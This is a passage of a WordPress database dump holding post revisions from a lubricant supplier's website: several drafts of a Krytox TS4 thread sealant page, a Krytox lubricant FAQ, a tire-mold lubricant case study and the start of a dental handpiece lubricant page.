13:39:59', '2016-10-07 13:39:59', '', 2302, 'https://www.miller-stephenson.com/2302-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2360, 2, '2016-10-12 20:11:51', '2016-10-12 20:11:51', '<h1><strong>Krytox TS4 Thread Sealant</strong></h1>\n<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly. Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\n<h4><strong>Key Benefits of Kytox™ TS4:</strong></h4>\n<ul>\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\n 	<li>No VOC content or hydrocarbon</li>\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\n 	<li>Cost-effective- only a small amount of sealant needed</li>\n 	<li>Fast and easy to apply</li>\n</ul>\n<h4><strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong></h4>\n<ul>\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\n</ul>\n<h4><strong>Recommended Product:</strong></h4>\n[ux_product_categories ids="165" number="10"]\n\nTo learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-autosave-v1', '', '', '2016-10-12 20:11:51', '2016-10-12 20:11:51', '', 2056, 'https://www.miller-stephenson.com/2056-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2361, 2, '2016-10-07 13:41:39', '2016-10-07 13:41:39', '<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n\r\n<strong>Key Benefits of Kytox™ TS4:</strong>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n[product_category category="165" per_page="12" columns="4" orderby="date" order="desc"]\r\n\r\nTo learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2016-10-07 13:41:39', '2016-10-07 13:41:39', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2362, 2, '2016-10-07 13:42:21', '2016-10-07 13:42:21', '<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n\r\n<strong>Key Benefits of Kytox™ TS4:</strong>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n[product_category category="TS4" per_page="12" columns="4" orderby="date" order="desc"]\r\n\r\nTo learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2016-10-07 13:42:21', '2016-10-07 13:42:21', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2363, 2, '2016-10-07 13:43:19', '2016-10-07 13:43:19', '<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n\r\n<strong>Key Benefits of Kytox™ TS4:</strong>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n[product id="989"]\r\n\r\nTo learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2016-10-07 13:43:19', '2016-10-07 13:43:19', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2364, 2, '2016-10-07 13:46:09', '2016-10-07 13:46:09', '<span style="font-size: 120%;"><strong>Krytox FAQ</strong></span>\r\n\r\n<span style="font-size: 110%;"><strong>Introduction to Krytox Lubricants</strong></span>\r\n\r\n<strong>What is Krytox FAQ?</strong>\r\n\r\nKrytox is the Chemours brand name for a range of clean, specialty synthetic lubricating materials available in numerous grades for a wide range of applications. Krytox lubricants have become the product of choice where extremely high or low temperature performance, nonflammability, oxygen compatibility, and resistance to aggressive chemicals are required. In this Krytox FAQ we discuss all the uses, applications and specifications of Krytox.\r\n\r\n<strong>What are the primary differences in Krytox oils?</strong>\r\n<ul>\r\n 	<li>Krytox XHT oils have additional treatment to make them more thermally stable at temperatures over 300 °C (572 °F) and have very high viscosity to withstand the temperatures and provide adequate lubrication.</li>\r\n 	<li>Krytox aerospace oils have more strict volatility specifications and are a narrower distillation than GPL oils.</li>\r\n 	<li>Krytox vacuum pump fluids are distilled to give an excellent vapor pressure and are designed for specific OEM pumps.</li>\r\n 	<li>Krytox linear oils have a better viscosity index and operate over a wider temperature range.</li>\r\n 	<li>Krytox GPL oils are formulated to provide a cost effective base oil for industrial applications.</li>\r\n</ul>\r\n<strong>Does Krytox contain silicone?</strong>\r\n\r\nNo. Krytox oils and greases do not contain any silicones,and there are no silicones used in processing.\r\n\r\n<strong>What are the different grades of Krytox GPL lubricants and their typical applications?</strong>\r\n<ul>\r\n 	<li>The Krytox GPL 10X oil /20X grease series contain no additives and can be used on components that come in contact with most chemicals typically used in industry. Typical applications include valves or bearings, seal barrier fluids, instruments, and oxygen systems.</li>\r\n 	<li>The Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or extremely heavily loaded applications.</li>\r\n 	<li>The Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor; it also improves load carrying performance and is ideal for corrosive environments. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.</li>\r\n 	<li>The Krytox GPL 29X greases have EP and anticorrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection.</li>\r\n 	<li>The Krytox GPL 2EX lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anti-corrosion additive.</li>\r\n</ul>\r\n<strong>What is Krytox made of?</strong>\r\n\r\nKrytox fluorinated oils are a series of low molecular weight, fluorine end-capped, homopolymers of hexafluoropropylene epoxide. The polymer chain is completely saturated and contains only the elements carbon, oxygen, and fluorine; hydrogen is not present. On a weight basis, typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\n\r\n<span style="font-size: 110%;"><strong>Krytox FAQ Applications</strong></span>\r\n\r\n<strong>Where can Krytox lubricants be used?</strong>\r\n\r\nKrytox lubricants can be used in applications where nonflammability, oxygen compatibility, materials compatibility, high temperature stability, and resistance to aggressive chemicals are requirements. Some examples include:\r\n<ul>\r\n 	<li><strong>Automotive</strong>: Wheel bearing grease, CV joint grease, universal joint grease, fan clutch bearing grease, emission air pump grease, spark plug boot lubricant, weather stripping lubricant, sunroof seal lubricant, clutch throw out bearing grease, ABS system grease, paint plant conveyor bearings, paint spray system valve lubrication, gasoline pump bearings, windshield wiper motors, oil pressure sensors, truck window lift mechanism, sintered bearings in motors, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls</li>\r\n 	<li><strong>Aviation</strong>: Fuel resistant grease, oxygen compatible grease, ventilation fan bearing grease, cruise missile rear main bearing lubricant, starter bearing grease, emergency generator bearing grease, missile launch\r\nplatform gear lubricant, space shuttle lubricant, sealant</li>\r\n 	<li><strong>Pumps</strong>: Vacuum pump fluid for corrosive and hazardous service, bearing grease for chemical pumps, O-ring lubricant, barrier fluid between double mechanical seals • Industrial: Corrugator and paper machine bearings, aluminum can manufacturing bearings, vacuum sputtering machines, welding machines, gear oil, linear bearing lubricant, high temperature fans, clean rooms, chlorine service, textile equipment, tenter frames, high speed motors, instrument bearings, sealed-for-life motors, conveyor system in glass and aluminum plants, textile calender roll bearings, brick kiln car bearings, film blowing machines</li>\r\n 	<li><strong>Nuclear</strong>: Submerged sump pump bearings, containment cooling fans, snubbers, control rod drive mechanism fan motors</li>\r\n 	<li><strong>Valves</strong>: Lubricant for valve stem packing, relief valve lubricant, O-ring lubricant, steam turbine control valves, low emissions valve stem packing lubricant</li>\r\n 	<li><strong>Miscellaneous</strong>: Anti-seize lubricant, bolt thread lubricant, water purifier lubricant, self-contained breathing apparatus lubricant, cryogenic lubricant, vacuum system sealant, drive chains, hydraulic fluids, instrument barrier fluids, heat transfer fluids, geothermal system grease, mold release agent, fishing reel grease, industrial toast making oven conveyor bearings, windmill gearboxes, glove curing conveyor</li>\r\n</ul>\r\n<strong>What is the NLGI consistency of Krytox grease grades?</strong>\r\n\r\nGreases are formed by mixing the base oil with a thickener to form a grease. Krytox greases use a special high-thickening efficiency, low molecular weight polytetrafluoroethylene (PTFE) with very small particle sizes as their thickener. This is one of the most thermally stable thickeners for high-temperature, long-term greases. The higher thickening efficiency of the special PTFE thickener allows Chemours to formulate grease to\r\nmaximize oil content for improved grease performance.\r\nGreases can be formulated with different viscosity oils to handle different temperatures and load conditions. High viscosity oils can be used in greases for high temperatures, heavy loads, or low speed applications.\r\nLow viscosity oils can be used in greases where low temperature properties are important or speeds are higher. Lower amounts of thickener form softer or more fluid-like greases. Higher solid levels form harder, stiffer\r\ngreases. Additives are often added to the grease to enhance anti-corrosion protection, raise load carrying ability, or help reduce wear.\r\nOur standard grease grade is NLGI Grade 2; however, upon request, we produce NLGI Grades 000 through 6.\r\n\r\n<strong>Do I need to do anything special before using Krytox in bearings?</strong>\r\n\r\nBefore adding Krytox grease to a bearing, the bearing should be cleaned of all existing greases, oils, or preservative oils used during storage. If hydrocarbon oils are left in a bearing, the oils can form carbon deposits at high temperatures that may accelerate bearing failure. Please ask for “New Bearing Preparation with Krytox Lubricants” for the recommended cleaning and repacking procedure, as well as guidance on how much grease to use and speed considerations.\r\n\r\n<strong>Is ongoing lubrication required once we’ve begun using Krytox?</strong>\r\n\r\nRe-lubrication of bearings may be required: typically every 1–3 months for corrugators, depending on the equipment operating temperature. For other applications, re-lubrication intervals can be from months to years or\r\npotentially never in the case of sealed systems.\r\n\r\n<strong>Can I mix Krytox grease with other greases?</strong>\r\n\r\nThe performance benefits of Krytox grease will not be achieved if Krytox is mixed with a non-perfluoropolyether (PFPE) grease. The performance of the grease mixture will be limited by the properties of the non-PFPE grease in the mixture. Krytox grease will not react with the other grease, nor cause decomposition or any hazardous reactions. The mixing tests that Chemours has done have shown that the mixture sometimes softens up by about one penetration grade when it is heated up. This normally will not be enough change to cause any significant problems.\r\nThe Krytox grease will not stop the other lubricant from breaking down from heat and oxidation. It is likely that the additives in the hydrocarbon grease have coated the bearing surfaces, and the Krytox grease will not be able to adhere to the bearing—so most of it might get thrown out of the bearing.\r\n\r\n<span style="font-size: 110%;"><strong>Characteristics of Krytox FAQ</strong></span>\r\n\r\n<strong>What approvals and certifications do Krytox lubricants have?</strong>\r\n\r\nKrytox lubricants have the following certifications:\r\n<ul>\r\n 	<li>ISO 9001 Certified Quality Management System</li>\r\n 	<li>ISO 14001 Certified Environmental Management System</li>\r\n</ul>\r\nIn addition, certain grades have the following approvals:\r\n<ul>\r\n 	<li>MIL-Spec PRF-27617 approved grades for aerospace and aviation use</li>\r\n 	<li>NSF H-1 food grade lubricants approved for incidental food contact</li>\r\n 	<li>Independently tested and confirmed for LOX and GOX use by major oxygen manufacturers and certification authorities</li>\r\n</ul>\r\nAre Krytox lubricants flammable?\r\n\r\nNo. Krytox lubricants are not combustible, nor do they ignite.\r\n\r\n<strong>How stable is Krytox when exposed to chemicals?</strong>\r\n\r\nKrytox PFPE oils and greases thickened with PTFE exhibit exceptional chemical stability. Krytox oils and greases will not react with most chemicals (with the exception of Lewis acids and alkali metals) and other\r\nlubricants, nor cause them to degrade. Krytox performance lubricants are not only resistant to oxygen and reactive gases, but they are inert to virtually all chemicals commonly used in most industries. For further information, please ask for “Krytox Lubricants: Chemical Stability.”\r\n\r\n<strong>Is Krytox compatible with nonmetallic materials?</strong>\r\n\r\nYes. Krytox oils and greases have been used as plastic or elastomer component lubricants for over 40 years. For more specific information, please ask for “Krytox Lubricants Plastics and Elastomer Compatibility.”\r\n\r\n<strong>Is Krytox oil hard to clean up?</strong>\r\n\r\nThe very characteristic that makes Krytox lubricant work as well as it does, i.e., its inertness to chemical attack, also makes it insoluble in most common solvents and is why it cannot be washed out with water. A small amount of a fluorinated solvent such as Krytox Solvent, Krytox HC Plus Cleaner, or Vertrel XF on a rag or towel will easily remove remaining traces of Krytox. For additional information, please request “Krytox HC Plus Cleaner” and “Krytox Solvent.”\r\n\r\n<strong>What is the shelf life of Krytox lubricants?</strong>\r\n\r\nKrytox greases and oils with no additives have an indefinite shelf life if left unopened and stored in a clean, dry location. The service life of Krytox is difficult to predict because there are so many variables. Testing\r\ndocuments Krytox grease at 200 ºC (392 °F) and 10,000 rpm for over 5,000 hours in an ASTM D3336 life test, and the bearings did not fail. For more detailed information, please ask for “Shelf Life Profile of Krytox\r\nLubricants.”\r\n\r\n<strong>What lubrication equipment can I use with Krytox grease?</strong>\r\n\r\nGenerally, any lubrication equipment manufacturer’s gun or pump that fits a standard grease cartridge or grease bucket should work. For more information about equipment grades and a discussion of grease fittings,\r\nplease ask for “Equipment Selection for Applying Krytox Lubricants.”\r\n\r\n<strong>TO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Krytox Lubricants, Greases and Oils"]\r\n\r\nThis Krytox FAQ is for educational purposes. To find your appropriate grade of Krytox please contact us or <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here to visit our Krytox database.</a>', 'Krytox Frequently Asked Questions (FAQ)', '', 'inherit', 'closed', 'closed', '', '2277-revision-v1', '', '', '2016-10-07 13:46:09', '2016-10-07 13:46:09', '', 2277, 'https://www.miller-stephenson.com/2277-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2365, 2, '2016-10-07 13:51:56', '2016-10-07 13:51:56', '<strong>Krytox TM7 Tire Mold Industry Lubricant</strong>\n\n<strong>An American tire manufacturer increases production and saves on costly mold repair by switching lubricants.</strong>\n\nU.S. tire manufacturer improves bottom line with new lubricant A major tire manufacturer located in the United States was experiencing significant, recurring problems with galling—roughening, wearing, or warping of metal at key moveable joints—on its segmented tire molds. This resulted in frequent production downtime and required costly repairs (averaging $5,000 per mold).\n\n<strong>The Challenge </strong>\n\nThe manufacturer needed to reduce or eliminate galling on mold surfaces. Extending re-lubrication intervals was also a high priority. Because tire plants use electrically and steam heated segmented molds, the lubricant chosen had to be unaffected by steam and able to withstand high temperatures. In addition, it was important that the lubricant would not carbonize.\n\n<strong>The Solution </strong>\n\nThe facility switched from a competitor’s product to Krytox TM-7 lubricant from Chemours and began to see immediate benefits. The problems previously experienced with galling have been eliminated; so, tire presses are no longer forced to sit idle while waiting for costly repairs to the molds. What’s more, Krytox TM-7 can effectively lubricate segmented tire molds for up to 120 days, extending the re-lubrication interval by up to three times the old cycle.\n\n&nbsp;\n\n<strong>Key Advantages</strong>\n<ul>\n 	<li>Using Krytox TM-7 lubricant, the facility was able to eliminate the problem of galling, not only saving mold repair costs but increasing production by keeping tire presses up and running.</li>\n 	<li>Lubrication cycle was extended from approximately 45 days to as long as 120 days, reducing costs and minimizing downtime for maintenance.</li>\n 	<li>Krytox TM-7 can be used in similar applications where heated metal slides across other metals, such as compression molding machines.</li>\n</ul>\n[product id=""]', 'Krytox TM7 For Tire Mold Industry', '', 'inherit', 'closed', 'closed', '', '1113-autosave-v1', '', '', '2016-10-07 13:51:56', '2016-10-07 13:51:56', '', 1113, 'https://www.miller-stephenson.com/1113-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2366, 2, '2016-10-07 13:52:08', '2016-10-07 13:52:08', '<strong>Krytox TM7 Tire Mold Industry Lubricant</strong>\r\n\r\n<strong>An American tire manufacturer increases production and saves on costly mold repair by switching lubricants.</strong>\r\n\r\nU.S. tire manufacturer improves bottom line with new lubricant A major tire manufacturer located in the United States was experiencing significant, recurring problems with galling—roughening, wearing, or warping of metal at key moveable joints—on its segmented tire molds. This resulted in frequent production downtime and required costly repairs (averaging $5,000 per mold).\r\n\r\n<strong>The Challenge </strong>\r\n\r\nThe manufacturer needed to reduce or eliminate galling on mold surfaces. Extending re-lubrication intervals was also a high priority. Because tire plants use electrically and steam heated segmented molds, the lubricant chosen had to be unaffected by steam and able to withstand high temperatures. In addition, it was important that the lubricant would not carbonize.\r\n\r\n<strong>The Solution </strong>\r\n\r\nThe facility switched from a competitor’s product to Krytox TM-7 lubricant from Chemours and began to see immediate benefits. The problems previously experienced with galling have been eliminated; so, tire presses are no longer forced to sit idle while waiting for costly repairs to the molds. What’s more, Krytox TM-7 can effectively lubricate segmented tire molds for up to 120 days, extending the re-lubrication interval by up to three times the old cycle.\r\n\r\n&nbsp;\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox TM-7 lubricant, the facility was able to eliminate the problem of galling, not only saving mold repair costs but increasing production by keeping tire presses up and running.</li>\r\n 	<li>Lubrication cycle was extended from approximately 45 days to as long as 120 days, reducing costs and minimizing downtime for maintenance.</li>\r\n 	<li>Krytox TM-7 can be used in similar applications where heated metal slides across other metals, such as compression molding machines.</li>\r\n</ul>\r\n[product id="1077"]', 'Krytox TM7 For Tire Mold Industry', '', 'inherit', 'closed', 'closed', '', '1113-revision-v1', '', '', '2016-10-07 13:52:08', '2016-10-07 13:52:08', '', 1113, 'https://www.miller-stephenson.com/1113-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2367, 2, '2016-10-07 13:53:28', '2016-10-07 13:53:28', '<span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span>\r\n\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, utilizing our proprietary fluorinated synthetic lubricant delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something 